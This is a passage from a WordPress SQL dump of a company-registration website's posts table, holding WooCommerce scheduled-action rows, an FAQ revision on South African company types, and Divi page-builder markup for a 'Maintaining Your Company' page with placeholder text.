11:21:08','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d53eeae22c734.75691348-VWAJsveCGy4UKo9Fj80RCG3jg2FJ4tcA','','','2019-08-14 13:21:18','2019-08-14 11:21:18','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32732',0,'scheduled-action','',3),(32733,0,'2019-08-14 11:21:08','2019-08-14 11:21:08','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d53eeae31c398.49284872-W8qxNkP4Wbhqu7QxRNCXbHXhWtnDHeit','','','2019-08-14 13:21:18','2019-08-14 11:21:18','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32733',0,'scheduled-action','',3),(32734,3,'2019-08-16 09:53:59','2019-08-16 07:53:59','<!-- wp:divi/placeholder /-->','Business Tools','','trash','closed','closed','','__trashed','','','2019-08-16 09:53:59','2019-08-16 07:53:59','',0,'https://companyregistration.online/?page_id=32734',0,'page','',0),(32735,3,'2019-08-14 12:31:44','2019-08-14 10:31:44','<!-- wp:divi/placeholder /-->','Business Tools','','inherit','closed','closed','','32734-revision-v1','','','2019-08-14 12:31:44','2019-08-14 10:31:44','',32734,'https://companyregistration.online/32734-revision-v1/',0,'revision','',0),(32736,0,'2019-08-14 12:21:18','2019-08-14 12:21:18','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d53fcc3cc9208.69737872-LzKplRUDhv3yFPLRAOQuIPiUa2WfOfrd','','','2019-08-14 14:21:23','2019-08-14 12:21:23','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32736',0,'scheduled-action','',3),(32737,0,'2019-08-14 12:21:18','2019-08-14 12:21:18','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d53fcc3dd7fc7.06103658-n1GHMZJUpSbzvELmKsn5mMLj7rznQL6D','','','2019-08-14 14:21:23','2019-08-14 12:21:23','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32737',0,'scheduled-action','',3),(32738,0,'2019-08-14 13:21:23','2019-08-14 13:21:23','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d540ade48eec8.71236692-qwEVHtp6VIRRCxen6ilpkbVRrCFb7c3N','','','2019-08-14 15:21:34','2019-08-14 13:21:34','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32738',0,'scheduled-action','',3),(32739,0,'2019-08-14 13:21:23','2019-08-14 13:21:23','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d540ade747073.64205231-n1FuiK5Kn3JwGWUTdcbYtfaEcDXPuUF5','','','2019-08-14 15:21:34','2019-08-14 13:21:34','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32739',0,'scheduled-action','',3),(32740,0,'2019-08-14 14:21:34','2019-08-14 14:21:34','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5418f47717f6.08183876-pardpv1rTWgpps4Jw30EU0tcLycgnncl','','','2019-08-14 16:21:40','2019-08-14 14:21:40','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32740',0,'scheduled-action','',3),(32741,0,'2019-08-14 14:21:34','2019-08-14 14:21:34','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5418f499ab57.65590408-XiAdulDnCvffiDy60ltbsK2RgbZ2IbFs','','','2019-08-14 16:21:40','2019-08-14 14:21:40','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32741',0,'scheduled-action','',3),(32742,0,'2019-08-14 15:21:40','2019-08-14 15:21:40','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5439dee84f50.46553350-kJLEQLuzPMbJMP7Xl6usYV6l8XNLD8WT','','','2019-08-14 18:42:06','2019-08-14 16:42:06','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32742',0,'scheduled-action','',3),(32743,0,'2019-08-14 15:21:40','2019-08-14 15:21:40','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5439df10efe7.38331463-Rhk7TK4NA35kxDo3rOGtX6nhkl7fC0kp','','','2019-08-14 18:42:07','2019-08-14 16:42:07','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32743',0,'scheduled-action','',3),(32744,0,'2019-08-14 17:42:07','2019-08-14 17:42:07','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d544be37411f0.26732900-UGAPQqv7fkMBlz4EJRAF4A5VqAywESHT','','','2019-08-14 19:58:59','2019-08-14 17:58:59','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32744',0,'scheduled-action','',3),(32745,0,'2019-08-14 17:42:07','2019-08-14 17:42:07','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d544be399a6b3.44675122-FHa31YtXaciLndjpqQkxMAsbyW5geGkG','','','2019-08-14 19:58:59','2019-08-14 17:58:59','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32745',0,'scheduled-action','',3),(32746,0,'2019-08-14 18:58:59','2019-08-14 18:58:59','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d545aaaf1b415.49310364-gHn2g7JO7dj8a9elaqLzDHddhZENIzKo','','','2019-08-14 21:02:02','2019-08-14 19:02:02','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32746',0,'scheduled-action','',3),(32747,0,'2019-08-14 18:58:59','2019-08-14 18:58:59','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d545aab6a4109.38329176-m3VUCgYLfixoqBTxgB7wjXO848ZcxrhD','','','2019-08-14 21:02:03','2019-08-14 19:02:03','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32747',0,'scheduled-action','',3),(32748,0,'2019-08-14 20:02:03','2019-08-14 20:02:03','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d546911a89188.52602237-8VTrAdtoxw1nha0x8mpXy8hPP808EmFR','','','2019-08-14 22:03:29','2019-08-14 20:03:29','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32748',0,'scheduled-action','',3),(32749,0,'2019-08-14 20:02:03','2019-08-14 20:02:03','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d546911d40c57.04415698-tiMAy664j36LN7QIfwQBWWe6JcfQED1j','','','2019-08-14 22:03:29','2019-08-14 20:03:29','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32749',0,'scheduled-action','',3),(32750,0,'2019-08-14 21:03:29','2019-08-14 21:03:29','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d548eb178dba0.53358607-IdZnYAgOgkurkiFesMUSZnjKbjhQk8TC','','','2019-08-15 00:44:01','2019-08-14 22:44:01','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32750',0,'scheduled-action','',3),(32751,0,'2019-08-14 21:03:29','2019-08-14 21:03:29','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d548eb1a5e3e7.19939062-Pe8LHUvJE50E2bY12O5ByCihIcRQEatP','','','2019-08-15 00:44:01','2019-08-14 22:44:01','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32751',0,'scheduled-action','',3),(32752,0,'2019-08-14 23:44:01','2019-08-14 23:44:01','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d54a5d9b1c0b5.97937853-y7nGmCA4T5qOOLOmbxdMSgVOahZ5g8g6','','','2019-08-15 02:22:49','2019-08-15 00:22:49','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32752',0,'scheduled-action','',3),(32753,0,'2019-08-14 23:44:01','2019-08-14 23:44:01','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d54a5da04b3d9.98511658-EsellcBjwNqV6S8TujKkJow1tME6vwvb','','','2019-08-15 02:22:50','2019-08-15 00:22:50','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32753',0,'scheduled-action','',3),(32754,0,'2019-08-15 01:22:49','2019-08-15 01:22:49','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d54b5cf993574.15826373-0tWBCx0erd6TCSb8NlkrzSskSIemdBSP','','','2019-08-15 03:30:55','2019-08-15 01:30:55','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32754',0,'scheduled-action','',3),(32755,0,'2019-08-15 01:22:50','2019-08-15 01:22:50','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d54b5cfa79257.69352090-aQK1eSR3TlYA2jwpwFzw73XElr9CW2kH','','','2019-08-15 03:30:55','2019-08-15 01:30:55','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32755',0,'scheduled-action','',3),(32756,0,'2019-08-15 02:30:55','2019-08-15 02:30:55','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d54c429e8b671.47921278-TaVEZgeV01Wcx0S76pgiuhrWL0ON6GYu','','','2019-08-15 04:32:09','2019-08-15 02:32:09','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32756',0,'scheduled-action','',3),(32757,0,'2019-08-15 02:30:55','2019-08-15 02:30:55','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d54c42a1ef452.76747561-6iAFOrugdXC3Tmx2kXvPQq4XVLqI0bFL','','','2019-08-15 04:32:10','2019-08-15 02:32:10','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32757',0,'scheduled-action','',3),(32758,0,'2019-08-15 03:32:10','2019-08-15 03:32:10','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d54d5e4b4f1a7.04745401-TbENZwnbwFGa090qEcMnItz4Ju2hDK6x','','','2019-08-15 05:47:48','2019-08-15 03:47:48','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32758',0,'scheduled-action','',3),(32759,0,'2019-08-15 03:32:10','2019-08-15 03:32:10','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d54d5e4d94ec9.58330646-jwJjejzQmMEw0WwC0Ym6o68u8sdc4zA8','','','2019-08-15 05:47:48','2019-08-15 03:47:48','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32759',0,'scheduled-action','',3),(32760,0,'2019-08-15 04:47:48','2019-08-15 04:47:48','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d54f82ba81b43.47246204-fURntUb1LWlTYJpGWXXpUVUo7cSHRpFZ','','','2019-08-15 08:14:03','2019-08-15 06:14:03','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32760',0,'scheduled-action','',3),(32761,0,'2019-08-15 04:47:48','2019-08-15 04:47:48','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d54f82bba2bb8.67601687-wzdhSlzx9Un0X9hUKU607jn9aVURDvGK','','','2019-08-15 08:14:03','2019-08-15 06:14:03','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32761',0,'scheduled-action','',3),(32762,0,'2019-08-15 07:14:03','2019-08-15 07:14:03','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5506658e8788.89001454-Np2SEHJlV76r9qmOMun4Y0HQvwU83MG9','','','2019-08-15 09:14:45','2019-08-15 07:14:45','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32762',0,'scheduled-action','',3),(32763,0,'2019-08-15 07:14:03','2019-08-15 07:14:03','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d550665a1adb7.05297554-3cpZ1SMTz2EWlUrAnUnLAfl4ATTVi7tf','','','2019-08-15 09:14:45','2019-08-15 07:14:45','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32763',0,'scheduled-action','',3),(32764,0,'2019-08-15 08:14:45','2019-08-15 08:14:45','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5514ad328e93.35778970-B7JnMeS65VGA7l4zV4ILKnkbjJNSi2Xg','','','2019-08-15 10:15:41','2019-08-15 08:15:41','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32764',0,'scheduled-action','',3),(32765,0,'2019-08-15 08:14:45','2019-08-15 08:14:45','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5514ad4521c3.03547940-AQhRS7nEmtYSUDidBopPMkLwSjBYFsq1','','','2019-08-15 10:15:41','2019-08-15 08:15:41','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32765',0,'scheduled-action','',3),(32769,3,'2019-08-15 09:45:57','2019-08-15 07:45:57','[et_pb_section admin_label=\"section\"]\n		[et_pb_row admin_label=\"row\"]\n			[et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\"][su_accordion]\r\n\r\n[su_spoiler title=\"What type of companies that can be registered in terms of the New Companies Act 71, 2008?\" style=\"fancy\"]\r\n<ul>\r\n	<li>Private company (Pty) Ltd</li>\r\n	<li>Public company (Ltd)</li>\r\n	<li>State-owned company (SOC)</li>\r\n	<li>External company</li>\r\n	<li>Personal liability company (Inc)</li>\r\n	<li>Non-profit company (NPC) [/su_spoiler]</li>\r\n</ul>\r\n[su_spoiler title=\"What is a private company?\" style=\"fancy\"]Private companies are comparable to companies of the same status under the Companies Act, 1973 and are characterised by the following:\r\n\r\nThey are subject to fewer disclosure and transparency requirements.\r\nA private company will still be prohibited from offering its shares to the public and the transferability of its shares will be restricted, but it may now have more than 50 shareholders.\r\nThe name of a private company must end with the expression “Proprietary Limited” or its abbreviation “(Pty) Ltd”.\r\nThe board of a private company must comprise at least one director, or any other minimum number as stipulated in its MOI. Each incorporator is a first director of the company.\r\n[/su_spoiler]\r\n\r\n&nbsp;\r\n\r\n[/su_accordion]\r\n\r\n&nbsp;[/et_pb_text][/et_pb_column]\n		[/et_pb_row]\n	[/et_pb_section]','Company Registration FAQs','','inherit','closed','closed','','357-revision-v1','','','2019-08-15 09:45:57','2019-08-15 07:45:57','',357,'https://companyregistration.online/357-revision-v1/',0,'revision','',0),(32813,3,'2019-08-15 15:25:51','2019-08-15 13:25:51','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\"]<h1>Maintaining Your Company</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-23.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px|||||\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Why should you maintain your company?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictum porta. Proin eget tortor risus. </p>\n<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictu</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Annual Returns\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" link_option_url=\"https://companyregistration.online/shop/maintaning-our-company/annual-returns/\"][/et_pb_blurb][et_pb_blurb title=\"Change In Closed Corporation Members\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" background_color=\"#ffffff\" link_option_url=\"https://companyregistration.online/shop/maintaning-our-company/change-in-members/\"][/et_pb_blurb][et_pb_blurb title=\"Change In Company  Address\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" background_color=\"#ffffff\" link_option_url=\"https://companyregistration.online/shop/maintaning-our-company/change-in-company-address/\"][/et_pb_blurb][et_pb_blurb title=\"Company Register\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" background_color=\"#ffffff\" link_option_url=\"https://companyregistration.online/shop/maintaning-our-company/company-register-2/\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Change In Directors\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" background_color=\"#ffffff\" link_option_url=\"https://companyregistration.online/shop/maintaning-our-company/change-in-directors/\"][/et_pb_blurb][et_pb_blurb title=\"Change In Closed Corporation Address\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" background_color=\"#ffffff\" link_option_url=\"https://companyregistration.online/shop/maintaning-our-company/change-in-close-corporation-address/\"][/et_pb_blurb][et_pb_blurb title=\"Company and Closed Corporation Restoration\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" background_color=\"#ffffff\" link_option_url=\"https://companyregistration.online/shop/maintaning-our-company/company-and-close-corporations-restorations/\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Process\" _builder_version=\"3.22\" locked=\"off\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>We Account For the All of the Biggest Product Categories</h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Healthcare</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" 